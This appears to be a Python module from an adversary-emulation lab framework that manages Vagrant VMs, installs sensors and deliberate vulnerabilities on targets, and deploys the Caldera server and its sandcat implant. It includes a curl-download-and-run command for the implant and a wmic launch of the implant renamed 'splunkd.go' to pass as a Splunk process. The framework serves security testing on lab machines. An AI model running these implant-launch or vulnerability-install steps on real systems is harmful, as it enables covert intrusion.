#!/usr/bin/env python3 """ (Virtual) machine handling. Start, stop, create and destroy. Starting remote commands on them. """ import os import time import requests from app.config import MachineConfig from app.exceptions import ServerError, ConfigurationError from app.pluginmanager import PluginManager from app.calderacontrol import CalderaControl from app.interface_sfx import CommandlineColors from plugins.base.machinery import MachineryPlugin from plugins.base.sensor import SensorPlugin from plugins.base.vulnerability_plugin import VulnerabilityPlugin class Machine(): """ A virtual machine. Attacker or target. Abstracting stuff away. """ def __init__(self, config, attack_logger, calderakey="ADMIN123",): """ @param config: The machine configuration as dict @param attack_logger: The attack logger to use @param calderakey: Key to the caldera controller """ self.vm_manager = None self.attack_logger = None self.set_attack_logger(attack_logger) if isinstance(config, MachineConfig): self.config = config else: self.config = MachineConfig(config) self.plugin_manager = PluginManager(self.attack_logger) # TODO: Read config from plugin if self.config.vmcontroller() == "vagrant": self.__parse_vagrant_config__() if self.config.vmcontroller() == "running_vm": self.__parse_running_vm_config__() self.caldera_server = None self.abs_machinepath_external = None self.abs_machinepath_external = os.path.join(self.vagrantfilepath, self.config.machinepath()) # TODO Add internal machinepath path for within the VM (/vagrant/machinepath) for non-linux machines self.abs_machinepath_internal = os.path.join("/vagrant/", self.config.machinepath()) if not os.path.exists(self.abs_machinepath_external): raise ConfigurationError(f"machinepath does not exist: {self.abs_machinepath_external}") self.load_machine_plugin() self.caldera_basedir = self.vm_manager.get_playground() self.calderakey = calderakey self.sensors = [] # Sensor plugins self.vulnerabilities = [] # Vulnerability plugins def __parse_vagrant_config__(self): """ Check if a file configured in the config is present """ self.vagrantfilepath = os.path.abspath(self.config.vagrantfilepath()) self.vagrantfile = os.path.join(self.vagrantfilepath, "Vagrantfile") if not os.path.isfile(self.vagrantfile): raise ConfigurationError(f"Vagrantfile not existing: {self.vagrantfile}") def __parse_running_vm_config__(self): """ Check if a file configured in the config is present """ self.vagrantfilepath = os.path.abspath(self.config.vagrantfilepath()) self.vagrantfile = os.path.join(self.vagrantfilepath, "Vagrantfile") def get_paw(self): """ Returns the paw of the current machine """ return self.config.caldera_paw() def get_group(self): """ Returns the group of the current machine """ return self.config.caldera_group() def destroy(self): """ Destroys the current machine """ self.vm_manager.__call_destroy__() def create(self, reboot=True): """ Create a VM @param reboot: Reboot the VM during installation. Required if you want to install software """ self.vm_manager.__call_create__(reboot) def reboot(self): """ Reboot a machine """ if self.get_os() == "windows": self.remote_run("shutdown /r") self.vm_manager.__call_disconnect__() time.sleep(60) # Shutdown can be slow.... if self.get_os() == "linux": self.remote_run("reboot") self.vm_manager.__call_disconnect__() res = None while not res: time.sleep(5) res = self.vm_manager.__call_connect__() self.attack_logger.vprint("Re-connecting....", 3) def up(self): # pylint: disable=invalid-name """ Starts a VM. Creates it if not already created """ self.vm_manager.__call_up__() def halt(self): """ Halts a VM """ self.vm_manager.__call_halt__() def getuser(self): """ Gets the user of the current VM """ return "Result " + str(self.vm_manager.__call_remote_run__("echo $USER")) def connect(self): """ command connection. establish it """ return self.vm_manager.__call_connect__() def disconnect(self, connection): """ Command connection dis-connect """ self.vm_manager.__call_disconnect__(connection) def remote_run(self, cmd, disown=False): """ Simplifies connect and run @param cmd: Command to run as shell command @param disown: run in background """ return self.vm_manager.__call_remote_run__(cmd, disown) def load_machine_plugin(self): """ Loads the matching machine plugin """ for plugin in self.plugin_manager.get_plugins(MachineryPlugin, [self.config.vmcontroller()]): name = plugin.get_name() self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Installing machinery: {name}{CommandlineColors.ENDC}", 1) syscon = {"abs_machinepath_internal": self.abs_machinepath_internal, "abs_machinepath_external": self.abs_machinepath_external} plugin.set_sysconf(syscon) plugin.__call_process_config__(self.config) self.vm_manager = plugin self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Installed machinery: {name}{CommandlineColors.ENDC}", 1) break def prime_sensors(self): """ Prime sensors from plugins (hard core installs that could require a reboot) A machine can have several sensors running. Those are defined in a list in the config. This primes the sensors """ reboot = False for plugin in self.plugin_manager.get_plugins(SensorPlugin, self.config.sensors()): name = plugin.get_name() # if name in self.config.sensors(): self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Priming sensor: {name}{CommandlineColors.ENDC}", 2) syscon = {"abs_machinepath_internal": self.abs_machinepath_internal, "abs_machinepath_external": self.abs_machinepath_external, } plugin.set_sysconf(syscon) plugin.set_machine_plugin(self.vm_manager) # TODO: Process experiment config to get sensor configuration plugin.process_config({}) # plugin specific configuration plugin.setup() reboot |= plugin.prime() self.sensors.append(plugin) self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Primed sensor: {name}{CommandlineColors.ENDC}", 2) return reboot def install_sensors(self): """ Install sensors from plugins A machine can have several sensors running. Those are defined in a list in the config. This installs the sensors """ for plugin in self.get_sensors(): name = plugin.get_name() self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Installing sensor: {name}{CommandlineColors.ENDC}", 2) syscon = {"abs_machinepath_internal": self.abs_machinepath_internal, "abs_machinepath_external": self.abs_machinepath_external, } plugin.set_sysconf(syscon) plugin.set_machine_plugin(self.vm_manager) plugin.process_config(self.config.raw_config.get(name, {})) # plugin specific configuration plugin.setup() plugin.install() self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Installed sensor: {name}{CommandlineColors.ENDC}", 2) def get_sensors(self) -> [SensorPlugin]: """ Returns a list of running sensors """ return self.sensors def start_sensors(self): """ Start sensors A machine can have several sensors running. Those are defined in a list in the config. This starts the sensors """ for plugin in self.get_sensors(): self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Starting sensor: {plugin.get_name()}{CommandlineColors.ENDC}", 2) plugin.set_machine_plugin(self.vm_manager) plugin.start() self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Started sensor: {plugin.get_name()}{CommandlineColors.ENDC}", 2) def stop_sensors(self): """ Stop sensors A machine can have several sensors running. Those are defined in a list in the config. This stops the sensors """ for plugin in self.get_sensors(): self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Stopping sensor: {plugin.get_name()}{CommandlineColors.ENDC}", 2) plugin.set_machine_plugin(self.vm_manager) plugin.stop() self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Stopped sensor: {plugin.get_name()}{CommandlineColors.ENDC}", 2) def collect_sensors(self, lootdir): """ Collect data from sensors A machine can have several sensors running. Those are defined in a list in the config. This collects the data from the sensors @param lootdir: Fresh created directory for loot """ machine_specific_path = os.path.join(lootdir, self.config.vmname()) os.mkdir(machine_specific_path) loot_files = [] for plugin in self.get_sensors(): self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Collecting sensor: {plugin.get_name()}{CommandlineColors.ENDC}", 2) plugin.set_machine_plugin(self.vm_manager) loot_files += plugin.__call_collect__(machine_specific_path) self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Collected sensor: {plugin.get_name()}{CommandlineColors.ENDC}", 2) return loot_files ############ def install_vulnerabilities(self): """ Install vulnerabilities from plugins: The machine is not yet modified ! For that call start_vulnerabilities next A machine can have several vulnerabilities. Those are defined in a list in the config. This installs the vulnerabilities """ for plugin in self.plugin_manager.get_plugins(VulnerabilityPlugin, self.config.vulnerabilities()): name = plugin.get_name() self.attack_logger.vprint(f"Configured vulnerabilities: {self.config.vulnerabilities()}", 3) self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Installing vulnerability: {name}{CommandlineColors.ENDC}", 2) syscon = {"abs_machinepath_internal": self.abs_machinepath_internal, "abs_machinepath_external": self.abs_machinepath_external} plugin.set_sysconf(syscon) plugin.process_config({}) # process plugin specific config plugin.set_machine_plugin(self.vm_manager) plugin.setup() plugin.install(self.vm_manager) self.vulnerabilities.append(plugin) def get_vulnerabilities(self) -> [VulnerabilityPlugin]: """ Returns a list of installed vulnerabilities """ return self.vulnerabilities def start_vulnerabilities(self): """ Really install the vulnerabilities on the machine A machine can have vulnerabilities installed. Those are defined in a list in the config. This starts the vulnerabilities """ for plugin in self.get_vulnerabilities(): self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Activating vulnerability: {plugin.get_name()}{CommandlineColors.ENDC}", 2) plugin.set_machine_plugin(self.vm_manager) plugin.start() def stop_vulnerabilities(self): """ Un-install the vulnerabilities on the machine A machine can have vulnerabilities installed. Those are defined in a list in the config. This stops the vulnerabilities """ for plugin in self.get_vulnerabilities(): self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Uninstalling vulnerability: {plugin.get_name()}{CommandlineColors.ENDC}", 2) plugin.set_machine_plugin(self.vm_manager) plugin.stop() ############ def get_ip(self): """ Returns the IP of the main ethernet interface of this machine """ # TODO: Create special code to extract windows IPs # TODO: Find a smarter way to get the ip return self.vm_manager.get_ip() def get_name(self): """ Returns the machine name """ return self.config.vmname() def get_nicknames(self): """ Returns the machine name """ return self.config.get_nicknames() def get_playground(self): """ Return this machine's playground """ return self.vm_manager.get_playground() def get_machine_path_external(self): """ Returns the external path for this machine """ return self.vm_manager.get_machine_path_external() def put(self, src, dst): """ Send a file to the machine """ return self.vm_manager.put(src, dst) def get(self, src, dst): """ Get a file from a machine """ return self.vm_manager.get(src, dst) def install_caldera_server(self, cleanup=False, version="2.8.1"): """ Installs the caldera server on the VM @param cleanup: Remove the old caldera version. Slow but reduces side effects @param version: Caldera version to use. Check Caldera git for potential branches to use """ # https://github.com/mitre/caldera.git self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Installing Caldera server {CommandlineColors.ENDC}", 1) if cleanup: cleanupcmd = "rm -rf caldera;" else: cleanupcmd = "" cmd = f"cd {self.caldera_basedir}; {cleanupcmd} git clone https://github.com/mitre/caldera.git --recursive --branch {version}; cd caldera; pip3 install -r requirements.txt" self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Caldera server installed {CommandlineColors.ENDC}", 1) res = self.vm_manager.__call_remote_run__(cmd) return "Result installing caldera server " + str(res) def wait_for_caldera_server(self, timeout=6): """ Ping caldera server. return as soon as it is responding @param timeout: timeout in seconds """ for i in range(timeout): time.sleep(10) caldera_url = "http://" + self.get_ip() + ":8888" caldera_control = CalderaControl(caldera_url, self.attack_logger, apikey=self.calderakey) self.attack_logger.vprint(f"{i} Trying to connect to {caldera_url} Caldera API", 3) try: caldera_control.list_adversaries() except requests.exceptions.ConnectionError: pass else: self.attack_logger.vprint("Caldera: All systems nominal", 3) return True raise ServerError def start_caldera_server(self): """ Start the caldera server on the VM. Required for an attacker VM """ # https://github.com/mitre/caldera.git self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Starting Caldera server {CommandlineColors.ENDC}", 1) # The pkill was added because the server sometimes gets stuck. And we can not re-create the attacking machines in all cases self.remote_run(" pkill -f server.py;", disown=False) cmd = f"cd {self.caldera_basedir}; cd caldera ; nohup python3 server.py --insecure &" self.remote_run(cmd, disown=True) self.wait_for_caldera_server() self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Caldera server started. Confirmed it is running. {CommandlineColors.ENDC}", 1) def create_start_caldera_client_cmd(self): """ Creates a command to start the caldera client """ playground = self.get_playground() if self.get_os() == "linux": # cmd = f"""chmod +x caldera_agent.sh; nohup bash {playground}/caldera_agent.sh start &""" cmd = f"""cd {playground}; chmod +x caldera_agent.sh; nohup bash ./caldera_agent.sh""" elif self.get_os() == "windows": if playground: playground = playground + "\\" # Workaround for Windows: Can not set target dir for fabric-put in Windows. Only default (none=user) dir available. else: playground = "" # playground = self.vm_manager.get_playground() cmd = f""" {playground}caldera_agent.bat """ return cmd def start_caldera_client(self): """ Install caldera client. Required on targets """ name = self.vm_manager.get_vm_name() self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Starting Caldera client {name} {CommandlineColors.ENDC}", 1) if self.get_os() == "windows": url = "http://" + self.caldera_server + ":8888" caldera_control = CalderaControl(url, self.attack_logger, apikey=self.calderakey) caldera_control.fetch_client(platform="windows", file="sandcat.go", target_dir=self.abs_machinepath_external, extension=".go") dst = self.get_playground() src = os.path.join(self.abs_machinepath_external, "caldera_agent.bat") self.vm_manager.put(src, dst) src = os.path.join(self.abs_machinepath_external, "splunkd.go") # sandcat.go local name self.vm_manager.put(src, dst) # cmd = self.__install_caldera_service_cmd().strip() cmd = self.__wmi_cmd_for_caldera_implant() print(cmd) self.remote_run(cmd, disown=True) if self.get_os() == "linux": dst = self.get_playground() src = os.path.join(self.abs_machinepath_external, "caldera_agent.sh") self.vm_manager.put(src, dst) cmd = self.create_start_caldera_client_cmd().strip() print(cmd) self.remote_run(cmd, disown=True) self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Caldera client started {CommandlineColors.ENDC}", 1) def get_os(self): """ Returns the OS of the machine """ return self.config.os() def __wmi_cmd_for_caldera_implant(self): """ Creates a windows specific command to start the caldera implant in background using wmi """ playground = self.get_playground() if playground: # Workaround for Windows: Can not set target dir for fabric-put in Windows. Only default (none=user) dir available. playground = playground + "\\" else: playground = "%userprofile%\\" url = "http://" + self.caldera_server + ":8888" res = f'wmic process call create "{playground}splunkd.go -server {url} -group {self.config.caldera_group()} -paw {self.config.caldera_paw()}" ' return res def __install_caldera_service_cmd(self): playground = self.get_playground() if self.get_os() == "linux": return f""" #!/bin/bash # Installs and runs the caldera agent # TODO: Respect start/stop commands cd {playground} server="http://{self.caldera_server}:8888"; curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > sandcat.go; chmod +x sandcat.go; nohup ./sandcat.go -server $server -group {self.config.caldera_group()} -v -paw {self.config.caldera_paw()} & """ if self.get_os() == "windows": if playground: # Workaround for Windows: Can not set target dir for fabric-put in Windows. Only default (none=user) dir available. playground = playground + "\\" else: playground = "" url = "http://" + self.caldera_server + ":8888" caldera_control = CalderaControl(url, self.attack_logger, apikey=self.calderakey) filename = caldera_control.fetch_client(platform="windows", file="sandcat.go", target_dir=self.abs_machinepath_external, extension=".go") return f""" START {playground}{filename} -server {url} -group {self.config.caldera_group()} -paw {self.config.caldera_paw()} """.strip() raise Exception # System type unknown def install_caldera_service(self): """ Install the caldera client as a service. For linux targets """ # print("DELETEME ! " + sys._getframe().f_code.co_name) content = self.__install_caldera_service_cmd() self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Installing Caldera service {CommandlineColors.ENDC}", 1) if self.get_os() == "linux": filename = os.path.join(self.abs_machinepath_external, "caldera_agent.sh") elif self.get_os() == "windows": filename = os.path.join(self.abs_machinepath_external, "caldera_agent.bat") with open(filename, "wt") as fh: fh.write(content) self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Installed Caldera service {CommandlineColors.ENDC}", 1) def set_caldera_server(self, server): """ Set the local caldera server config """ self.caldera_server = server def set_attack_logger(self, attack_logger): """ Configure the attack logger for this server @param attack_logger: The attack logger to set """ self.attack_logger = attack_logger